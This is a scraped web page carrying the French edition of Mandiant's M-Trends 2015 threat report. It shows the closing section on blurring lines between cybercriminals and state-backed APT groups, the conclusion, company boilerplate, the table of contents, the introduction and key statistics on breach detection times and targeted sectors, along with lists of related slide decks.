victimes en Ukraine, faisant ainsi écho aux
tensions actuelles avec la Russie. Le groupe
aurait également déployé ce toolkit pour cibler
des équipements SCADA (Supervisory Control
and Data Acquisition), très présents dans les
infrastructures critiques et les environnements
industriels.17
De même, les outils de production de diverses
industries se sont trouvés au cœur de la tempête.
En revanche, les prototypes mis au point par ces
entreprises et les réseaux contenant et trans-
mettant des informations sensibles (financières
et de propriété intellectuelle) n’ont pas été tou-
chés. On peut donc en déduire que les attaques
cherchaient des faiblesses à exploiter pour
commettre des actes de sabotage. En faisant
appel à du crimeware comme BlackEnergy, ils
tentaient vraisemblablement de garder un
certain degré d’anonymat.
Ces différences ont-elles une
importance ?
Dans le monde de la sécurité, le débat reste ou-
vert sur l’intérêt même de discerner les motiva-
tions d’une attaque et de l’attribuer à tel ou tel
auteur.
Certains avancent le fait que d’un point de vue
réseau, peu importe qui se cache derrière la
compromission : il faut d’abord la stopper et
l’éradiquer.
De même, la convergence des outils et méthodes
employés par les cybercriminels et les auteurs
d’APT complique encore un peu plus la question
autour de l’intention et de l’impact potentiel. Et
l’on ne parle même pas des dénégations et
manœuvres trompeuses des attaquants, des
disparités dans les mesures de répression, ou
des liens alambiqués que certains agents des
pouvoirs publics entretiennent avec la pègre.
Dans ce tableau pour le moins confus, le
décryptage des intentions et motivations d’une
attaque pourra guider votre intervention.
Prenons l’exemple d’un groupe russe menant
des activités de cyberespionnage au profit d’un
gouvernement. Derrière des outils de crime-
ware d’apparence classique, les attaquants
chercheront en fait à accéder à distance à des
pans entiers d’infrastructure critique aux
États-Unis. On comprend dès lors qu’une telle
attaque ne pourra pas être traitée de la même
manière qu’une menace financière ordinaire, et
ce malgré les similitudes dans l’arsenal utilisé.
Le fait de savoir si un malware est un vecteur
d’infection préalable à l’attaque d’un groupe
étatique, ou une simple menace mineure aux
effets bénins, changera sans aucun doute la
nature de votre réaction et de votre interven-
tion. De même, le vol de données orchestré par
des cybercriminels exigera une réponse
différente, compte tenu de l’immédiateté de
l’impact — contrairement à l’espionnage d’État
dans lequel l’usage de l’intelligence exfiltrée est
beaucoup plus nébuleux.
À RETENIR : Dans un contexte de convergence des outils, techniques et pro-
cédures utilisés par les cybercriminels d’une part, et les auteurs d’APT d’autre part,
vous devrez passer au crible les intentions et les motivations de chaque attaque.
Seule cette rigueur d’analyse vous permettra de bien diagnostiquer l’impact
potentiel d’un incident de sécurité, d’y répondre de manière adaptée et d’aligner
votre stratégie de défense sur la typologie des menaces en présence.
www.mandiant.com	23
À
l’heure où la cybersécurité prend le
devant de la scène, les entreprises
doivent aborder la question des vols de
données sous un angle nouveau — non pas
comme une source d’embarras et de crispation,
mais bien comme une réalité économique. Ils
devront pour cela anticiper et affronter les
incidents de sécurité avec confiance.
Or, cette attitude volontariste appelle à une nou-
velle approche de la cybersécurité. Personne ne
peut prévenir toutes les compromissions. Mais
la prévention, la détection, l’analyse et la neutra-
lisation rapides et efficaces des menaces les plus
avancées vous permettront de vous prémunir
vous-mêmes, vos clients et vos partenaires
contre les conséquences désastreuses qui font
la une des médias.
La sécurité infaillible n’existe pas. Personne ne
peut prévoir les nouvelles techniques d’infiltra-
tion. Et comme 2014 nous l’a rappelé, aucun
groupe d’attaque ne baissera pavillon sous le
seul prétexte qu’un nouvel outil de sécurité est
parvenu à le neutraliser.
Il n’en reste pas moins qu’avec un bon dosage de
technologies, d’intelligence et d’expertise, les
entreprises peuvent entamer un processus de
renforcement de leur sécurité. Ainsi, elles seront
capables de s’adapter pour garder un coup
d’avance sur les nouvelles menaces, les nou-
veaux outils et les nouveaux moyens de
compromission des réseaux.
Si les méchants sont rusés, bien équipés et
déterminés, il n’y a aucune raison que les
gentils ne le soient pas aussi.
CONCLUSION
L’an dernier, les attaquants ont poursuivi leur mutation, à mesure qu’ils élargis-
saient leur cible et modifiaient leurs modes opératoires. L’histoire est pourtant
restée la même : beaucoup trop d’entreprises n’étaient pas préparées à des
compromissions pourtant inévitables, laissant ainsi les attaquants agir trop long-
temps en toute quiétude dans les environnements compromis.
24 	 www.mandiant.com
Les nouvelles du frontM-Trends
À propos de Mandiant
Mandiant, une entreprise FireEye, compte à son actif d’innombrables missions de réponse à incident
et d’élimination des groupes d’attaques avancés pour des centaines de clients dans tous les grands
secteurs d’activité. Nous sommes l’interlocuteur privilégié des grands groupes et administrations qui
veulent se protéger et réagir à des incidents de sécurité critiques de toutes natures. En cas d’intrusion
avérée, les services de conseil en sécurité de Mandiant interviennent à vos côtés pour riposter et
reprendre le contrôle de vos réseaux, avec l’appui de la cyberveille et des technologies FireEye.
À propos de FireEye
FireEye intervient dans le monde entier pour protéger les ressources critiques contre tout acte
malveillant. Ensemble, nos technologies, notre cyberveille, notre expertise et notre équipe d’interven-
tion rapide vous aident à éliminer l’impact des attaques informatiques. Nous débusquons et neutrali-
sons les attaquants à chaque étape d’une intrusion. Avec FireEye, vous détectez les attaques en temps
réel. Vous évaluez le risque qu’elles posent pour vos ressources stratégiques. Et vous disposez des
moyens de réponse et de résolution des incidents de sécurité. La FireEye Global Defense Community
comprend plus de 2 700 clients dans 67 pays, dont 157 entreprises du Fortune 500.
Mandiant, une entreprise FireEye  |  (+1) 703.683.3141  |  (+1) 800.647.7020 |  info@mandiant.com  |  www.mandiant.com | www.fireeye.com
© 2015 FireEye, Inc. Tous droits réservés. Mandiant et le logo M sont des marques déposées de FireEye, Inc.
Toutes les autres marques, produits ou noms de service sont, ou peuvent être, des marques commerciales ou
de service de leurs détenteurs respectifs. RPT.MTRENDS.FR-FR.022415
A FireEye®
Company

Contenu connexe

Tendances

Tendances (20)

La cybersécurité à l’ère de l’infonuagique et de l’industrie 4.0 (Vumetric)
La cybersécurité à l’ère de l’infonuagique et de l’industrie 4.0 (Vumetric)La cybersécurité à l’ère de l’infonuagique et de l’industrie 4.0 (Vumetric)
La cybersécurité à l’ère de l’infonuagique et de l’industrie 4.0 (Vumetric)
 
FIDDAYS - Cybersecurite, comment proteger son entreprise ?
FIDDAYS - Cybersecurite, comment proteger son entreprise ?FIDDAYS - Cybersecurite, comment proteger son entreprise ?
FIDDAYS - Cybersecurite, comment proteger son entreprise ?
 
Cyberattaques : prenez de l’avance sur les cybercriminels
Cyberattaques : prenez de l’avance sur les cybercriminelsCyberattaques : prenez de l’avance sur les cybercriminels
Cyberattaques : prenez de l’avance sur les cybercriminels
 
CESIN - Baromètre de la cyber-sécurité des entreprises - Vague 1 - Par Opinio...
CESIN - Baromètre de la cyber-sécurité des entreprises - Vague 1 - Par Opinio...CESIN - Baromètre de la cyber-sécurité des entreprises - Vague 1 - Par Opinio...
CESIN - Baromètre de la cyber-sécurité des entreprises - Vague 1 - Par Opinio...
 
Quels subsides pour vous aider à faire face aux cybercriminels?
Quels subsides pour vous aider à faire face aux cybercriminels? Quels subsides pour vous aider à faire face aux cybercriminels?
Quels subsides pour vous aider à faire face aux cybercriminels?
 
Cybersécurité en milieu industriel : un constat alarmant, une prise de consci...
Cybersécurité en milieu industriel : un constat alarmant, une prise de consci...Cybersécurité en milieu industriel : un constat alarmant, une prise de consci...
Cybersécurité en milieu industriel : un constat alarmant, une prise de consci...
 
Cybercriminalité: comment agir dès aujourd'hui
Cybercriminalité: comment agir dès aujourd'huiCybercriminalité: comment agir dès aujourd'hui
Cybercriminalité: comment agir dès aujourd'hui
 
Cybersécurité - Comment protéger ses activités ?
Cybersécurité - Comment protéger ses activités ?Cybersécurité - Comment protéger ses activités ?
Cybersécurité - Comment protéger ses activités ?
 
Sthack 2015 - Wilfrid "@WilfridBlanc" Blanc & Adrien Revol - Cybersécurité In...
Sthack 2015 - Wilfrid "@WilfridBlanc" Blanc & Adrien Revol - Cybersécurité In...Sthack 2015 - Wilfrid "@WilfridBlanc" Blanc & Adrien Revol - Cybersécurité In...
Sthack 2015 - Wilfrid "@WilfridBlanc" Blanc & Adrien Revol - Cybersécurité In...
 
ANSSI D2IE Formation à la cybersécurité des TPE / PME
ANSSI D2IE Formation à la cybersécurité des TPE / PMEANSSI D2IE Formation à la cybersécurité des TPE / PME
ANSSI D2IE Formation à la cybersécurité des TPE / PME
 
[Webinar] Cybersécurité : risques et ressources pour les startups @DGE
[Webinar] Cybersécurité : risques et ressources pour les startups @DGE [Webinar] Cybersécurité : risques et ressources pour les startups @DGE
[Webinar] Cybersécurité : risques et ressources pour les startups @DGE
 
Cybersécurité en 2017 : à quoi s'attendre ?
Cybersécurité en 2017 : à quoi s'attendre ?Cybersécurité en 2017 : à quoi s'attendre ?
Cybersécurité en 2017 : à quoi s'attendre ?
 
Conférence DI 2014 - Cyberconflictualité, hacking d'influence et prévisibilit...
Conférence DI 2014 - Cyberconflictualité, hacking d'influence et prévisibilit...Conférence DI 2014 - Cyberconflictualité, hacking d'influence et prévisibilit...
Conférence DI 2014 - Cyberconflictualité, hacking d'influence et prévisibilit...
 
Sogeti cybersecurity
Sogeti cybersecuritySogeti cybersecurity
Sogeti cybersecurity
 
Introduction à la cybersécurité des organisations
Introduction à la cybersécurité des organisationsIntroduction à la cybersécurité des organisations
Introduction à la cybersécurité des organisations
 
Livre blanc F-Secure Ransomware - le chantage qui fait déchanter
Livre blanc F-Secure Ransomware - le chantage qui fait déchanterLivre blanc F-Secure Ransomware - le chantage qui fait déchanter
Livre blanc F-Secure Ransomware - le chantage qui fait déchanter
 
Etude Kaspersky Lab : Impact Phishing sur les finances
Etude Kaspersky Lab : Impact Phishing sur les financesEtude Kaspersky Lab : Impact Phishing sur les finances
Etude Kaspersky Lab : Impact Phishing sur les finances
 
Cyber-attaques : Comment les combattre ? Gérer les risques connus, anticiper ...
Cyber-attaques : Comment les combattre ? Gérer les risques connus, anticiper ...Cyber-attaques : Comment les combattre ? Gérer les risques connus, anticiper ...
Cyber-attaques : Comment les combattre ? Gérer les risques connus, anticiper ...
 
Etude Apec - La cybersécurité industrielle : tendances métiers dans l'industrie
Etude Apec - La cybersécurité industrielle : tendances métiers dans l'industrieEtude Apec - La cybersécurité industrielle : tendances métiers dans l'industrie
Etude Apec - La cybersécurité industrielle : tendances métiers dans l'industrie
 
Meetup Cybersécurité RGPD Conséquences dans l'Embarqué
Meetup Cybersécurité RGPD Conséquences dans l'EmbarquéMeetup Cybersécurité RGPD Conséquences dans l'Embarqué
Meetup Cybersécurité RGPD Conséquences dans l'Embarqué
 

En vedette

Tahun 4 mobail buah-buahan
Tahun 4 mobail   buah-buahanTahun 4 mobail   buah-buahan
Tahun 4 mobail buah-buahan
ong2012
 
50 sites 21st century skills
50 sites 21st century skills50 sites 21st century skills
50 sites 21st century skills
Brandon Raymo
 
La perdurabilidad en las empresas amiliasde
La perdurabilidad en las empresas amiliasdeLa perdurabilidad en las empresas amiliasde
La perdurabilidad en las empresas amiliasde
mariaperezgamboa
 
Meningkatkan kemampuan koneksi matematis siswa dengan cps
Meningkatkan kemampuan koneksi matematis siswa dengan cpsMeningkatkan kemampuan koneksi matematis siswa dengan cps
Meningkatkan kemampuan koneksi matematis siswa dengan cps
Madunforyou Madunforyou
 
Orlando SFDC User Group 4/2009
Orlando SFDC User Group 4/2009Orlando SFDC User Group 4/2009
Orlando SFDC User Group 4/2009
Joshua Hoskins
 
Persepsi guru-tentang-buku-teks
Persepsi guru-tentang-buku-teksPersepsi guru-tentang-buku-teks
Persepsi guru-tentang-buku-teks
Felix Baskara
 

En vedette (19)

M-Trends® 2013: Attack the Security Gap
M-Trends® 2013: Attack the Security GapM-Trends® 2013: Attack the Security Gap
M-Trends® 2013: Attack the Security Gap
 
Savannah chatham (1)..
Savannah chatham (1)..Savannah chatham (1)..
Savannah chatham (1)..
 
Działania a diagnozy - jak raporty badawcze wpływają na rozwój lokalnych cent...
Działania a diagnozy - jak raporty badawcze wpływają na rozwój lokalnych cent...Działania a diagnozy - jak raporty badawcze wpływają na rozwój lokalnych cent...
Działania a diagnozy - jak raporty badawcze wpływają na rozwój lokalnych cent...
 
Caching By Nyros Developer
Caching By Nyros DeveloperCaching By Nyros Developer
Caching By Nyros Developer
 
Rekod kehadiran kelab
Rekod kehadiran kelabRekod kehadiran kelab
Rekod kehadiran kelab
 
Yearbook concept for abankirenk creative
Yearbook concept for abankirenk creativeYearbook concept for abankirenk creative
Yearbook concept for abankirenk creative
 
Alaa Bebars
Alaa BebarsAlaa Bebars
Alaa Bebars
 
Photo essay by kimberly demusz
Photo essay by kimberly demuszPhoto essay by kimberly demusz
Photo essay by kimberly demusz
 
Towards an Open Data Center with an Interoperable Network (ODIN) : Volume 2: ...
Towards an Open Data Center with an Interoperable Network (ODIN) : Volume 2: ...Towards an Open Data Center with an Interoperable Network (ODIN) : Volume 2: ...
Towards an Open Data Center with an Interoperable Network (ODIN) : Volume 2: ...
 
Viral growth – presentation at European Innovation Academy 2015
Viral growth – presentation at European Innovation Academy 2015Viral growth – presentation at European Innovation Academy 2015
Viral growth – presentation at European Innovation Academy 2015
 
Kenali bentuk asas huruf
Kenali bentuk asas hurufKenali bentuk asas huruf
Kenali bentuk asas huruf
 
Tahun 4 mobail buah-buahan
Tahun 4 mobail   buah-buahanTahun 4 mobail   buah-buahan
Tahun 4 mobail buah-buahan
 
50 sites 21st century skills
50 sites 21st century skills50 sites 21st century skills
50 sites 21st century skills
 
Ecmp 455 intro
Ecmp 455 introEcmp 455 intro
Ecmp 455 intro
 
La perdurabilidad en las empresas amiliasde
La perdurabilidad en las empresas amiliasdeLa perdurabilidad en las empresas amiliasde
La perdurabilidad en las empresas amiliasde
 
JBoye Presentation: WCM Trends for 2010
JBoye Presentation: WCM Trends for 2010JBoye Presentation: WCM Trends for 2010
JBoye Presentation: WCM Trends for 2010
 
Meningkatkan kemampuan koneksi matematis siswa dengan cps
Meningkatkan kemampuan koneksi matematis siswa dengan cpsMeningkatkan kemampuan koneksi matematis siswa dengan cps
Meningkatkan kemampuan koneksi matematis siswa dengan cps
 
Orlando SFDC User Group 4/2009
Orlando SFDC User Group 4/2009Orlando SFDC User Group 4/2009
Orlando SFDC User Group 4/2009
 
Persepsi guru-tentang-buku-teks
Persepsi guru-tentang-buku-teksPersepsi guru-tentang-buku-teks
Persepsi guru-tentang-buku-teks
 

Similaire à M-Trends 2015 : Les nouvelles du front

Tendances cloud-livre-blanc-collaboratif
Tendances cloud-livre-blanc-collaboratifTendances cloud-livre-blanc-collaboratif
Tendances cloud-livre-blanc-collaboratif
harrybosch
 

Similaire à M-Trends 2015 : Les nouvelles du front (20)

Livre blanc : La cyber-résilience : une nouvelle vision sur la sécurité
Livre blanc : La cyber-résilience : une nouvelle vision sur la sécuritéLivre blanc : La cyber-résilience : une nouvelle vision sur la sécurité
Livre blanc : La cyber-résilience : une nouvelle vision sur la sécurité
 
CYBER-ATTAQUE: OÙ EN SONT LES ENTREPRISES FRANÇAISES ? Enquête 2015
CYBER-ATTAQUE: OÙ EN SONT LES ENTREPRISES FRANÇAISES ? Enquête 2015CYBER-ATTAQUE: OÙ EN SONT LES ENTREPRISES FRANÇAISES ? Enquête 2015
CYBER-ATTAQUE: OÙ EN SONT LES ENTREPRISES FRANÇAISES ? Enquête 2015
 
Tendances cloud-livre-blanc-collaboratif
Tendances cloud-livre-blanc-collaboratifTendances cloud-livre-blanc-collaboratif
Tendances cloud-livre-blanc-collaboratif
 
Tendances cloud
Tendances cloudTendances cloud
Tendances cloud
 
Mémoire Les nouvelles technologies, les marques et la grande distribution
Mémoire Les nouvelles technologies, les marques et la grande distributionMémoire Les nouvelles technologies, les marques et la grande distribution
Mémoire Les nouvelles technologies, les marques et la grande distribution
 
ETUDE - Le Digital dans l'Assurance
ETUDE - Le Digital dans l'AssuranceETUDE - Le Digital dans l'Assurance
ETUDE - Le Digital dans l'Assurance
 
Le logiciel libre dans le secteur public, un état des lieux en juin 2013
Le logiciel libre dans le secteur public, un état des lieux en juin 2013Le logiciel libre dans le secteur public, un état des lieux en juin 2013
Le logiciel libre dans le secteur public, un état des lieux en juin 2013
 
Thèse Professionnelle - Optimiser sa communication et son marketing grâce à l...
Thèse Professionnelle - Optimiser sa communication et son marketing grâce à l...Thèse Professionnelle - Optimiser sa communication et son marketing grâce à l...
Thèse Professionnelle - Optimiser sa communication et son marketing grâce à l...
 
Guide du Big Data 2015 - 2016
Guide du Big Data 2015 - 2016Guide du Big Data 2015 - 2016
Guide du Big Data 2015 - 2016
 
Guide bigdata 2015_2016
Guide bigdata 2015_2016Guide bigdata 2015_2016
Guide bigdata 2015_2016
 
Guide routard intelligence économique 2014
Guide routard intelligence économique 2014Guide routard intelligence économique 2014
Guide routard intelligence économique 2014
 
Guide du routard de l'intelligence économique - édition 2014
Guide du routard de l'intelligence économique - édition 2014 Guide du routard de l'intelligence économique - édition 2014
Guide du routard de l'intelligence économique - édition 2014
 
Les nouvelles technologies de l’information et de la communication : l’évolut...
Les nouvelles technologies de l’information et de la communication : l’évolut...Les nouvelles technologies de l’information et de la communication : l’évolut...
Les nouvelles technologies de l’information et de la communication : l’évolut...
 
Les amis, les ennemis et Facebook : la nouvelle lutte contre les escrocs
Les amis, les ennemis et Facebook : la nouvelle lutte contre les escrocsLes amis, les ennemis et Facebook : la nouvelle lutte contre les escrocs
Les amis, les ennemis et Facebook : la nouvelle lutte contre les escrocs
 
Si dans le tourisme
Si dans le tourismeSi dans le tourisme
Si dans le tourisme
 
Breve histoire-digital-analytics-par-brice-bottegal
Breve histoire-digital-analytics-par-brice-bottegalBreve histoire-digital-analytics-par-brice-bottegal
Breve histoire-digital-analytics-par-brice-bottegal
 
Advergaming : une stratégie efficace
Advergaming : une stratégie efficaceAdvergaming : une stratégie efficace
Advergaming : une stratégie efficace
 
CapHorn Invest - Revue de presse Q4 2018
CapHorn Invest - Revue de presse Q4 2018CapHorn Invest - Revue de presse Q4 2018
CapHorn Invest - Revue de presse Q4 2018
 
2010 Stratégie de Portail by Beijaflore
2010 Stratégie de Portail by Beijaflore2010 Stratégie de Portail by Beijaflore
2010 Stratégie de Portail by Beijaflore
 
Rapport Auditeurs Cigref Inhesj - Sécurité des objets connectés - Décembre 2014
Rapport Auditeurs Cigref Inhesj - Sécurité des objets connectés - Décembre 2014Rapport Auditeurs Cigref Inhesj - Sécurité des objets connectés - Décembre 2014
Rapport Auditeurs Cigref Inhesj - Sécurité des objets connectés - Décembre 2014
 

Plus de FireEye, Inc.

Plus de FireEye, Inc. (20)

Asia Pacific & The Security Gap: Don't Stand Still
Asia Pacific & The Security Gap: Don't Stand StillAsia Pacific & The Security Gap: Don't Stand Still
Asia Pacific & The Security Gap: Don't Stand Still
 
EMEA & The Security Gap: Don't Stand Still
EMEA & The Security Gap: Don't Stand StillEMEA & The Security Gap: Don't Stand Still
EMEA & The Security Gap: Don't Stand Still
 
[Industry Intelligence Brief] Cyber Threats to the Legal and Professional Ser...
[Industry Intelligence Brief] Cyber Threats to the Legal and Professional Ser...[Industry Intelligence Brief] Cyber Threats to the Legal and Professional Ser...
[Industry Intelligence Brief] Cyber Threats to the Legal and Professional Ser...
 
M-Trends 2015 セキュリティ最前線からの視点
M-Trends 2015 セキュリティ最前線からの視点M-Trends 2015 セキュリティ最前線からの視点
M-Trends 2015 セキュリティ最前線からの視点
 
[Infographic] Healthcare Cyber Security: Threat Prognosis
[Infographic] Healthcare Cyber Security: Threat Prognosis[Infographic] Healthcare Cyber Security: Threat Prognosis
[Infographic] Healthcare Cyber Security: Threat Prognosis
 
[Infographic] Email: The First Security Gap Targeted by Attackers
[Infographic] Email: The First Security Gap Targeted by Attackers[Infographic] Email: The First Security Gap Targeted by Attackers
[Infographic] Email: The First Security Gap Targeted by Attackers
 
M-Trends 2015: 최일선에서 본 관점
M-Trends 2015: 최일선에서 본 관점 M-Trends 2015: 최일선에서 본 관점
M-Trends 2015: 최일선에서 본 관점
 
M-Trends 2015 セキュリティ最前線からの視点
M-Trends 2015 セキュリティ最前線からの視点M-Trends 2015 セキュリティ最前線からの視点
M-Trends 2015 セキュリティ最前線からの視点
 
5 Reasons Cyber Attackers Target Small and Medium Businesses
5 Reasons Cyber Attackers Target Small and Medium Businesses 5 Reasons Cyber Attackers Target Small and Medium Businesses
5 Reasons Cyber Attackers Target Small and Medium Businesses
 
Connected Cares: The Open Road For Hackers
Connected Cares: The Open Road For HackersConnected Cares: The Open Road For Hackers
Connected Cares: The Open Road For Hackers
 
M-Trends® 2012: An Evolving Threat
M-Trends® 2012: An Evolving Threat M-Trends® 2012: An Evolving Threat
M-Trends® 2012: An Evolving Threat
 
M-Trends® 2011: When Prevention Fails
M-Trends® 2011: When Prevention Fails M-Trends® 2011: When Prevention Fails
M-Trends® 2011: When Prevention Fails
 
M-Trends® 2010: The Advanced Persistent Threat
 M-Trends® 2010: The Advanced Persistent Threat M-Trends® 2010: The Advanced Persistent Threat
M-Trends® 2010: The Advanced Persistent Threat
 
SANS 2013 Report: Digital Forensics and Incident Response Survey
SANS 2013 Report: Digital Forensics and Incident Response Survey  SANS 2013 Report: Digital Forensics and Incident Response Survey
SANS 2013 Report: Digital Forensics and Incident Response Survey
 
SANS 2013 Report on Critical Security Controls Survey: Moving From Awareness ...
SANS 2013 Report on Critical Security Controls Survey: Moving From Awareness ...SANS 2013 Report on Critical Security Controls Survey: Moving From Awareness ...
SANS 2013 Report on Critical Security Controls Survey: Moving From Awareness ...
 
2013 Incident Response Survey
2013 Incident Response Survey2013 Incident Response Survey
2013 Incident Response Survey
 
The Internal Signs of Compromise
The Internal Signs of CompromiseThe Internal Signs of Compromise
The Internal Signs of Compromise
 
The Board and Cyber Security
The Board and Cyber SecurityThe Board and Cyber Security
The Board and Cyber Security
 
FireEye Cyber Defense Summit 2016 Now What - Before & After The Breach
FireEye Cyber Defense Summit 2016 Now What - Before & After The BreachFireEye Cyber Defense Summit 2016 Now What - Before & After The Breach
FireEye Cyber Defense Summit 2016 Now What - Before & After The Breach
 
Proatively Engaged: Questions Executives Should Ask Their Security Teams
Proatively Engaged: Questions Executives Should Ask Their Security TeamsProatively Engaged: Questions Executives Should Ask Their Security Teams
Proatively Engaged: Questions Executives Should Ask Their Security Teams
 

M-Trends 2015 : Les nouvelles du front

  • 1. R A P P O R T S U R L E S M E N A C E S LES NOUVELLES DU FRONT M-Trends® 2015 : SECURITY CONSULTING
  • 2. Les nouvelles du frontM-Trends Introduction. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 Les chiffres clés. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 Tendance 1 : Le signalement des attaques informatiques et ses problèmes. . . . . . . . . . . . . . 4 Un public sensible à la cybersécurité. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 Rehausser le niveau. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4 Pourquoi tant d’attaques informatiques révélées dans la presse ? . . . . . . . . . . . . . . . . . . . . . 5 Tendance 2 : Le commerce et la distribution dans le viseur . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Les serveurs d’applications virtuelles comme point d’entrée. . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Nouveaux outils, nouvelles tactiques, nouveaux modes opératoires. . . . . . . . . . . . . . . . . . . 7 Recrudescence des attaques sur les paiements en ligne. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 Recommandations. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12 Tendance 3 : L’évolution du cycle de vie des attaques. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 Détournements des connexions VPN. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13 Dissimulation de malwares sous le nez des victimes. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 Vol de mots de passe en toute simplicité. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18 Déplacements latéraux avec WMI et PowerShell. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19 Tendance 4 : Entre cybercriminels et groupes APT, la frontière s’estompe. . . . . . . . . . . . . . 20 Évaluer l’intention dans un climat d’incertitude : une tâche délicate. . . . . . . . . . . . . . . . . . 20 Ces différences ont-elles une importance ?. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22 Conclusion. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 À propos de Mandiant. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 À propos de FireEye. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24 SOMMAIRE
  • 3. www.mandiant.com 1 INTRODUCTION Depuis des années, nous ne cessons de répéter que la sécurité parfaite n’existe pas. Les événements de 2014 devraient nous donner raison une bonne fois pour toutes. M algré quelques modestes progrès dans les capacités des entreprises à renforcer leur sécurité, les auteurs d’attaques avancées (ou non) continuent de trouver les moyens de contourner les dispositifs de sécurité en place. Dans le rapport M-Trends de l’an passé, nous remarquions que la cybersécurité était passée d’une problématique informatique isolée à une priorité absolue pour les instances dirigeantes des entreprises. Cette année, la cybersécurité, ou plutôt la « cyberinsécurité », a pris le devant de la scène. Pour les seules premières semaines de 2015, la question s’est invitée tour à tour dans le discours du président américain sur l’état de l’Union1 , dans l’intrigue d’un film à gros budget2 et dans l’allocution d’ouverture de la cérémonie des Golden Globe Awards.3 En tant que premier intervenant sur des incidents de sécurité critiques, Mandiant a acquis une perspective unique sur les modes opératoires et les motivations des attaquants. Les analyses et éclairages livrés dans ce document sont le fruit d’une expérience cumulée au cours de centaines de missions sur le terrain. Au cours des dix dernières années, nous sommes intervenus aux côtés de clients dans plus de 30 secteurs d’activité à travers le monde. Malgré une amélioration certaine dans les systèmes de détection des entreprises, les pirates ont encore pu agir trop longtemps avant d’être détectés, soit en moyenne 205 jours en 2014 contre 229 jours en 2013. Dans le même temps, le nombre d’entreprises ayant découvert elles-mêmes ce type d’intrusion est resté globalement stable. En 2014, 69 % des structures victimes d’une compromission de sécurité en ont été alertées par des entités externes, notamment les services de police. Ce chiffre traduit une légère hausse par rapport à 2013 (67 %) et 2012 (63 %) Le commerce et la grande distribution sont restés des cibles privilégiées, à l’heure où les attaquants déploient de nouvelles méthodes pour exfiltrer les numéros de carte des systèmes de paiement en magasin. Dans le domaine des cartes bancaires à puce avec code PIN, nous avons observé une recrudescence des attaques à l’encontre des sites e-commerce et des prestataires de traitement des paiements. Par ailleurs, certaines branches d’activité dans lesquelles nous étions jusqu’alors peu interve­ nus se sont trouvées en ligne de mire : Services aux entreprises, santé, organismes publics et organisations internationales. Dès que les équipes de sécurité déploient de nouvelles lignes de défense, les pirates changent de tactique. L’an passé, cette dynamique s’est développée à grande échelle, sous nos yeux. Aussi avons-nous pu observer les nouvelles méthodes (ou parfois des méthodes éprouvées remises au goût du jour) employées par les attaquants pour infiltrer les réseaux privés virtuels (VPN), échapper à toute détection, dérober des identifiants de connexion et maintenir une présence furtive et persistante dans les environnements compromis. L’année 2014 fut également marquée par une hausse des déclarations publiques d’incidents de sécurité par les victimes elles-mêmes. Pour autant, ces dernières restent plus que jamais dans le flou sur une question essentielle : qui m’attaque ? D’autant que la frontière tend à s’estomper entre les cybercriminels ordinaires et les groupes à la solde d’États, à mesure que les premiers haussent leur niveau de jeu et que les seconds utilisent des kits d’attaque clé-en- main pour brouiller les pistes. Ensemble, ces développements dépeignent un tableau des menaces plus complexe que jamais. Dans ce contexte, jamais la mission des équipes de sécurité n’a été aussi difficile – et cruciale – pour prévenir, détecter, analyser et réagir aux attaques. 1 Michael D. Shear (The New York Times). “Obama to Announce Cybersecurity Plans in State of the Union Preview.” Janvier 2015. 2 Sheri Linden (The Hollywood Reporter). “’Blackhat’: Film Review.” Janvier 2015. 3 Christopher Palmeri (Bloomberg). “Hollywood ‘Spoiled Brats’ Are Easy Targets at Golden Globes.” Janvier 2015.
  • 4. 2 www.mandiant.com Les nouvelles du frontM-Trends Plusieurs secteurs dans lesquels nous avions jusqu’alors peu enquêté sont apparus comme de nouvelles cibles privilégiées : Services aux entreprises Organismes publics et organisations internationales Santé 6 % Santé 5 % Transports 3 % Aérospatiale et défense 7 % Services juridiques 8 % Autre 7 % High-tech et informatique 8 % Construction et ingénierie 17 % Services aux entreprises 7 % Organismes publics et organisations internationales 14 % Commerce et distribution 10 % Services financiers 3% 8 % Médias et divertissements 5% En 2014, nous avons observé des variations du nombre de nos interventions dans certains domaines : Commerce et distribution — de 4 % à 14 % Médias et divertissements — de 13 % à 8 % Secteurs d’activité dans lesquels Mandiant a enquêté sur des intrusions LES CHIFFRES CLÉS Un large éventail d’industries a été pris pour cible en 2014, y compris dans des branches autrefois relativement épargnées. De même, bien que les entreprises aient été plus promptes à découvrir une compromission qu’en 2013, elles ont encore laissé beaucoup trop de temps aux attaquants pour agir incognito. Pire encore, elles ont été moins nombreuses que les années précédentes à découvrir l’intrusion par leurs propres moyens.
